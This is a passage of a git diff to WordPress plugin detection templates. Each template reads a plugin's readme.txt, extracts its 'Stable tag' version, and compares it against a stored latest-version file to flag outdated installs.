matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-autoptimize.txt b/technologies/wordpress/wordpress-autoptimize.txt new file mode 100644 index 0000000000..b532f3dc33 --- /dev/null +++ b/technologies/wordpress/wordpress-autoptimize.txt @@ -0,0 +1 @@ +3.1.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-autoptimize.yaml b/technologies/wordpress/wordpress-autoptimize.yaml index 7357000193..03306aa8c7 100644 --- a/technologies/wordpress/wordpress-autoptimize.yaml +++ b/technologies/wordpress/wordpress-autoptimize.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-autoptimize.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-backwpup.txt b/technologies/wordpress/wordpress-backwpup.txt new file mode 100644 index 0000000000..0c89fc927e --- /dev/null +++ b/technologies/wordpress/wordpress-backwpup.txt @@ -0,0 +1 @@ +4.0.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-backwpup.yaml b/technologies/wordpress/wordpress-backwpup.yaml index 55a2cf2c2f..acd3928501 100644 --- a/technologies/wordpress/wordpress-backwpup.yaml +++ b/technologies/wordpress/wordpress-backwpup.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-backwpup.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-better-search-replace.txt b/technologies/wordpress/wordpress-better-search-replace.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-better-search-replace.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-better-search-replace.yaml b/technologies/wordpress/wordpress-better-search-replace.yaml index b4954c16a6..68db0100f7 100644 --- a/technologies/wordpress/wordpress-better-search-replace.yaml +++ b/technologies/wordpress/wordpress-better-search-replace.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-better-search-replace.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-better-wp-security.txt b/technologies/wordpress/wordpress-better-wp-security.txt new file mode 100644 index 0000000000..001bf16406 --- /dev/null +++ b/technologies/wordpress/wordpress-better-wp-security.txt @@ -0,0 +1 @@ +8.1.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-better-wp-security.yaml b/technologies/wordpress/wordpress-better-wp-security.yaml index ea58f7e389..3d5e7463d8 100644 --- a/technologies/wordpress/wordpress-better-wp-security.yaml +++ b/technologies/wordpress/wordpress-better-wp-security.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-better-wp-security.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.txt b/technologies/wordpress/wordpress-black-studio-tinymce-widget.txt new file mode 100644 index 0000000000..fbafd6b600 --- /dev/null +++ b/technologies/wordpress/wordpress-black-studio-tinymce-widget.txt @@ -0,0 +1 @@ +2.7.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml index 1a382879e4..da7a093bc8 100644 --- a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml +++ b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-black-studio-tinymce-widget.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.txt b/technologies/wordpress/wordpress-breadcrumb-navxt.txt new file mode 100644 index 0000000000..3769235d3e --- /dev/null +++ b/technologies/wordpress/wordpress-breadcrumb-navxt.txt @@ -0,0 +1 @@ +7.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml index da196e9d09..8957d3f2f2 100644 --- a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml +++ b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-breadcrumb-navxt.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-broken-link-checker.txt b/technologies/wordpress/wordpress-broken-link-checker.txt new file mode 100644 index 0000000000..52e7d0fa58 --- /dev/null +++ b/technologies/wordpress/wordpress-broken-link-checker.txt @@ -0,0 +1 @@ +1.11.21 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-broken-link-checker.yaml b/technologies/wordpress/wordpress-broken-link-checker.yaml index 323db345da..7969fa6dcf 100644 --- a/technologies/wordpress/wordpress-broken-link-checker.yaml +++ b/technologies/wordpress/wordpress-broken-link-checker.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-broken-link-checker.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-child-theme-configurator.txt b/technologies/wordpress/wordpress-child-theme-configurator.txt new file mode 100644 index 0000000000..914ec96711 --- /dev/null +++ b/technologies/wordpress/wordpress-child-theme-configurator.txt @@ -0,0 +1 @@ +2.6.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-child-theme-configurator.yaml b/technologies/wordpress/wordpress-child-theme-configurator.yaml index 6e56d731d8..ee214cd855 100644 --- a/technologies/wordpress/wordpress-child-theme-configurator.yaml +++ b/technologies/wordpress/wordpress-child-theme-configurator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-child-theme-configurator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-classic-editor.txt b/technologies/wordpress/wordpress-classic-editor.txt new file mode 100644 index 0000000000..308b6faa75 --- /dev/null +++ b/technologies/wordpress/wordpress-classic-editor.txt @@ -0,0 +1 @@ +1.6.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-classic-editor.yaml b/technologies/wordpress/wordpress-classic-editor.yaml index 2b006bb874..a8d6c35a7d 100644 --- a/technologies/wordpress/wordpress-classic-editor.yaml +++ b/technologies/wordpress/wordpress-classic-editor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-classic-editor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-classic-widgets.txt b/technologies/wordpress/wordpress-classic-widgets.txt new file mode 100644 index 0000000000..1d71ef9744 --- /dev/null +++ b/technologies/wordpress/wordpress-classic-widgets.txt @@ -0,0 +1 @@ +0.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-classic-widgets.yaml b/technologies/wordpress/wordpress-classic-widgets.yaml index 8a361a8adc..1405d7faaf 100644 --- a/technologies/wordpress/wordpress-classic-widgets.yaml +++ b/technologies/wordpress/wordpress-classic-widgets.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-classic-widgets.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt new file mode 100644 index 0000000000..0caba26085 --- /dev/null +++ b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt @@ -0,0 +1 @@ +3.17.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml index f330d8e9eb..8d0057c22c 100644 --- a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml +++ b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-click-to-chat-for-whatsapp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cloudflare.txt b/technologies/wordpress/wordpress-cloudflare.txt new file mode 100644 index 0000000000..91f3b43844 --- /dev/null +++ b/technologies/wordpress/wordpress-cloudflare.txt @@ -0,0 +1 @@ +4.11.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cloudflare.yaml b/technologies/wordpress/wordpress-cloudflare.yaml index be6d0e9fd6..b64de3464e 100644 --- a/technologies/wordpress/wordpress-cloudflare.yaml +++ b/technologies/wordpress/wordpress-cloudflare.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-cloudflare.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cmb2.txt b/technologies/wordpress/wordpress-cmb2.txt new file mode 100644 index 0000000000..5cc8215758 --- /dev/null +++ b/technologies/wordpress/wordpress-cmb2.txt @@ -0,0 +1 @@ +2.10.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cmb2.yaml b/technologies/wordpress/wordpress-cmb2.yaml index a5e98325cb..e5e1241c8e 100644 --- a/technologies/wordpress/wordpress-cmb2.yaml +++ b/technologies/wordpress/wordpress-cmb2.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-cmb2.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-coblocks.txt b/technologies/wordpress/wordpress-coblocks.txt new file mode 100644 index 0000000000..98b6180181 --- /dev/null +++ b/technologies/wordpress/wordpress-coblocks.txt @@ -0,0 +1 @@ +2.25.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-coblocks.yaml b/technologies/wordpress/wordpress-coblocks.yaml index fc3d8fd905..3d3e321c9a 100644 --- a/technologies/wordpress/wordpress-coblocks.yaml +++ b/technologies/wordpress/wordpress-coblocks.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-coblocks.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-code-snippets.txt b/technologies/wordpress/wordpress-code-snippets.txt new file mode 100644 index 0000000000..acf9bf09db --- /dev/null +++ b/technologies/wordpress/wordpress-code-snippets.txt @@ -0,0 +1 @@ +3.2.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-code-snippets.yaml b/technologies/wordpress/wordpress-code-snippets.yaml index 7986f1a30f..066b60d6a0 100644 --- a/technologies/wordpress/wordpress-code-snippets.yaml +++ b/technologies/wordpress/wordpress-code-snippets.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-code-snippets.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-coming-soon.txt b/technologies/wordpress/wordpress-coming-soon.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-coming-soon.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-coming-soon.yaml b/technologies/wordpress/wordpress-coming-soon.yaml index aa34845b98..5f4495e012 100644 --- a/technologies/wordpress/wordpress-coming-soon.yaml +++ b/technologies/wordpress/wordpress-coming-soon.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-coming-soon.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-complianz-gdpr.txt b/technologies/wordpress/wordpress-complianz-gdpr.txt new file mode 100644 index 0000000000..2319a69f28 --- /dev/null +++ b/technologies/wordpress/wordpress-complianz-gdpr.txt @@ -0,0 +1 @@ +6.3.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-complianz-gdpr.yaml b/technologies/wordpress/wordpress-complianz-gdpr.yaml index 28b63c244b..024405f700 100644 --- a/technologies/wordpress/wordpress-complianz-gdpr.yaml +++ b/technologies/wordpress/wordpress-complianz-gdpr.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-complianz-gdpr.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.txt b/technologies/wordpress/wordpress-contact-form-7-honeypot.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-7-honeypot.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml index 09780bdb5d..0bdaef58e3 100644 --- a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml +++ b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-contact-form-7-honeypot.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-7.txt b/technologies/wordpress/wordpress-contact-form-7.txt new file mode 100644 index 0000000000..2a06a418a7 --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-7.txt @@ -0,0 +1 @@ +5.6.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-7.yaml b/technologies/wordpress/wordpress-contact-form-7.yaml index e021cba23b..b9b401873d 100644 --- a/technologies/wordpress/wordpress-contact-form-7.yaml +++ b/technologies/wordpress/wordpress-contact-form-7.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-contact-form-7.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.txt b/technologies/wordpress/wordpress-contact-form-cfdb7.txt new file mode 100644 index 0000000000..246d157007 --- /dev/null +++ b/technologies/wordpress/wordpress-contact-form-cfdb7.txt @@ -0,0 +1 @@ +1.2.6.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml index e798a8a28d..287f0e4b10 100644 --- a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml +++ b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-contact-form-cfdb7.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cookie-law-info.txt b/technologies/wordpress/wordpress-cookie-law-info.txt new file mode 100644 index 0000000000..8ffc1ad640 --- /dev/null +++ b/technologies/wordpress/wordpress-cookie-law-info.txt @@ -0,0 +1 @@ +3.0.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cookie-law-info.yaml b/technologies/wordpress/wordpress-cookie-law-info.yaml index 794db8d91d..545e11395a 100644 --- a/technologies/wordpress/wordpress-cookie-law-info.yaml +++ b/technologies/wordpress/wordpress-cookie-law-info.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-cookie-law-info.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-cookie-notice.txt b/technologies/wordpress/wordpress-cookie-notice.txt new file mode 100644 index 0000000000..acdc3f1b0b --- /dev/null +++ b/technologies/wordpress/wordpress-cookie-notice.txt @@ -0,0 +1 @@ +2.4.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cookie-notice.yaml b/technologies/wordpress/wordpress-cookie-notice.yaml index 001b762c70..02346802d5 100644 --- a/technologies/wordpress/wordpress-cookie-notice.yaml +++ b/technologies/wordpress/wordpress-cookie-notice.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-cookie-notice.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.txt b/technologies/wordpress/wordpress-creame-whatsapp-me.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-creame-whatsapp-me.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml index f6a67bfe4f..b3fe5c67bf 100644 --- a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml +++ b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-creame-whatsapp-me.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt 